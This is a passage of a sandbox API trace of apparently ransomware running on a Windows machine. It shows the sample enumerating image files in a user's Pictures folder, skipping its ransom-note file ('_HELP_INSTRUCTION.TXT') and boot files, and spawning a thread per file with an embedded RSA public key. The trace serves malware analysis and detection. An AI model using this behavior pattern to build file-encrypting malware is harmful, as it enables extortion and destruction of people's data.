PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0125.015] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Hx4D_z73m1pGCpzIPXzy.bmp" | out: lpString1="Hx4D_z73m1pGCpzIPXzy.bmp") returned="Hx4D_z73m1pGCpzIPXzy.bmp" [0125.015] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0125.015] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5ec [0125.015] Sleep (dwMilliseconds=0x96) [0125.180] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0125.180] lstrcmpW (lpString1="k3NI.jpg", lpString2="..") returned 1 [0125.180] lstrcmpW (lpString1="k3NI.jpg", lpString2=".") returned 1 [0125.180] StrStrW (lpFirst="k3NI.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0125.180] StrStrW (lpFirst="k3NI.jpg", lpSrch="ntldr") returned 0x0 [0125.180] StrStrW (lpFirst="k3NI.jpg", lpSrch="NTLDR") returned 0x0 [0125.180] StrStrW (lpFirst="k3NI.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0125.180] StrStrW (lpFirst="k3NI.jpg", lpSrch="ntdetect.com") returned 0x0 [0125.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0125.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0125.180] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0125.180] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0125.180] lstrcpyW (in: lpString1=0x17cf1c, lpString2="k3NI.jpg" | out: lpString1="k3NI.jpg") returned="k3NI.jpg" [0125.181] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0125.181] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5cc [0125.181] Sleep (dwMilliseconds=0x96) [0125.338] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0125.338] lstrcmpW (lpString1="kfqhp.png", lpString2="..") returned 1 [0125.338] lstrcmpW (lpString1="kfqhp.png", lpString2=".") returned 1 [0125.338] StrStrW (lpFirst="kfqhp.png", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0125.338] StrStrW (lpFirst="kfqhp.png", lpSrch="ntldr") returned 0x0 [0125.338] StrStrW (lpFirst="kfqhp.png", lpSrch="NTLDR") returned 0x0 [0125.338] StrStrW (lpFirst="kfqhp.png", lpSrch="NTDETECT.COM") returned 0x0 [0125.338] StrStrW (lpFirst="kfqhp.png", lpSrch="ntdetect.com") returned 0x0 [0125.339] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0125.339] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0125.339] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0125.339] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0125.339] lstrcpyW (in: lpString1=0x17cf1c, lpString2="kfqhp.png" | out: lpString1="kfqhp.png") returned="kfqhp.png" [0125.339] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0125.339] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5fc [0125.339] Sleep (dwMilliseconds=0x96) [0125.510] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0125.510] lstrcmpW (lpString1="LiEtBonze.png", lpString2="..") returned 1 [0125.510] lstrcmpW (lpString1="LiEtBonze.png", lpString2=".") returned 1 [0125.510] StrStrW (lpFirst="LiEtBonze.png", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0125.510] StrStrW (lpFirst="LiEtBonze.png", lpSrch="ntldr") returned 0x0 [0125.510] StrStrW (lpFirst="LiEtBonze.png", lpSrch="NTLDR") returned 0x0 [0125.510] StrStrW (lpFirst="LiEtBonze.png", lpSrch="NTDETECT.COM") returned 0x0 [0125.510] StrStrW (lpFirst="LiEtBonze.png", lpSrch="ntdetect.com") returned 0x0 [0125.510] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0125.510] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0125.510] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0125.510] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0125.510] lstrcpyW (in: lpString1=0x17cf1c, lpString2="LiEtBonze.png" | out: lpString1="LiEtBonze.png") returned="LiEtBonze.png" [0125.510] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0125.510] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f0 [0125.511] Sleep (dwMilliseconds=0x96) [0125.694] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0125.695] lstrcmpW (lpString1="mXMMLg1uw.bmp", lpString2="..") returned 1 [0125.695] lstrcmpW (lpString1="mXMMLg1uw.bmp", lpString2=".") returned 1 [0125.695] StrStrW (lpFirst="mXMMLg1uw.bmp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0125.695] StrStrW (lpFirst="mXMMLg1uw.bmp", lpSrch="ntldr") returned 0x0 [0125.695] StrStrW (lpFirst="mXMMLg1uw.bmp", lpSrch="NTLDR") returned 0x0 [0125.695] StrStrW (lpFirst="mXMMLg1uw.bmp", lpSrch="NTDETECT.COM") returned 0x0 [0125.695] StrStrW (lpFirst="mXMMLg1uw.bmp", lpSrch="ntdetect.com") returned 0x0 [0125.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0125.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0125.695] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0125.695] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0125.695] lstrcpyW (in: lpString1=0x17cf1c, lpString2="mXMMLg1uw.bmp" | out: lpString1="mXMMLg1uw.bmp") returned="mXMMLg1uw.bmp" [0125.695] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0125.695] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f8 [0125.695] Sleep (dwMilliseconds=0x96) [0125.850] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0125.851] lstrcmpW (lpString1="oEKbZ-fUq6tWCg3E9gms.gif", lpString2="..") returned 1 [0125.851] lstrcmpW (lpString1="oEKbZ-fUq6tWCg3E9gms.gif", lpString2=".") returned 1 [0125.851] StrStrW (lpFirst="oEKbZ-fUq6tWCg3E9gms.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0125.851] StrStrW (lpFirst="oEKbZ-fUq6tWCg3E9gms.gif", lpSrch="ntldr") returned 0x0 [0125.851] StrStrW (lpFirst="oEKbZ-fUq6tWCg3E9gms.gif", lpSrch="NTLDR") returned 0x0 [0125.851] StrStrW (lpFirst="oEKbZ-fUq6tWCg3E9gms.gif", lpSrch="NTDETECT.COM") returned 0x0 [0125.851] StrStrW (lpFirst="oEKbZ-fUq6tWCg3E9gms.gif", lpSrch="ntdetect.com") returned 0x0 [0125.851] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0125.851] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0125.851] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0125.851] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0125.851] lstrcpyW (in: lpString1=0x17cf1c, lpString2="oEKbZ-fUq6tWCg3E9gms.gif" | out: lpString1="oEKbZ-fUq6tWCg3E9gms.gif") returned="oEKbZ-fUq6tWCg3E9gms.gif" [0125.851] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0125.851] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x600 [0125.851] Sleep (dwMilliseconds=0x96) [0126.007] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0126.007] lstrcmpW (lpString1="pDGmGQvtKPZ_ns.gif", lpString2="..") returned 1 [0126.007] lstrcmpW (lpString1="pDGmGQvtKPZ_ns.gif", lpString2=".") returned 1 [0126.007] StrStrW (lpFirst="pDGmGQvtKPZ_ns.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0126.007] StrStrW (lpFirst="pDGmGQvtKPZ_ns.gif", lpSrch="ntldr") returned 0x0 [0126.007] StrStrW (lpFirst="pDGmGQvtKPZ_ns.gif", lpSrch="NTLDR") returned 0x0 [0126.007] StrStrW (lpFirst="pDGmGQvtKPZ_ns.gif", lpSrch="NTDETECT.COM") returned 0x0 [0126.007] StrStrW (lpFirst="pDGmGQvtKPZ_ns.gif", lpSrch="ntdetect.com") returned 0x0 [0126.007] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0126.007] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0126.007] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0126.007] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0126.007] lstrcpyW (in: lpString1=0x17cf1c, lpString2="pDGmGQvtKPZ_ns.gif" | out: lpString1="pDGmGQvtKPZ_ns.gif") returned="pDGmGQvtKPZ_ns.gif" [0126.007] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0126.007] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f4 [0126.007] Sleep (dwMilliseconds=0x96) [0126.162] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0126.163] lstrcmpW (lpString1="PTV-5E.jpg", lpString2="..") returned 1 [0126.163] lstrcmpW (lpString1="PTV-5E.jpg", lpString2=".") returned 1 [0126.163] StrStrW (lpFirst="PTV-5E.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0126.163] StrStrW (lpFirst="PTV-5E.jpg", lpSrch="ntldr") returned 0x0 [0126.163] StrStrW (lpFirst="PTV-5E.jpg", lpSrch="NTLDR") returned 0x0 [0126.163] StrStrW (lpFirst="PTV-5E.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0126.163] StrStrW (lpFirst="PTV-5E.jpg", lpSrch="ntdetect.com") returned 0x0 [0126.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0126.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0126.163] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0126.163] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0126.163] lstrcpyW (in: lpString1=0x17cf1c, lpString2="PTV-5E.jpg" | out: lpString1="PTV-5E.jpg") returned="PTV-5E.jpg" [0126.163] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0126.163] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x604 [0126.163] Sleep (dwMilliseconds=0x96) [0126.319] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0126.319] lstrcmpW (lpString1="VL2r.jpg", lpString2="..") returned 1 [0126.319] lstrcmpW (lpString1="VL2r.jpg", lpString2=".") returned 1 [0126.319] StrStrW (lpFirst="VL2r.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0126.319] StrStrW (lpFirst="VL2r.jpg", lpSrch="ntldr") returned 0x0 [0126.319] StrStrW (lpFirst="VL2r.jpg", lpSrch="NTLDR") returned 0x0 [0126.319] StrStrW (lpFirst="VL2r.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0126.319] StrStrW (lpFirst="VL2r.jpg", lpSrch="ntdetect.com") returned 0x0 [0126.319] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0126.319] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0126.319] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0126.319] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0126.319] lstrcpyW (in: lpString1=0x17cf1c, lpString2="VL2r.jpg" | out: lpString1="VL2r.jpg") returned="VL2r.jpg" [0126.319] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" 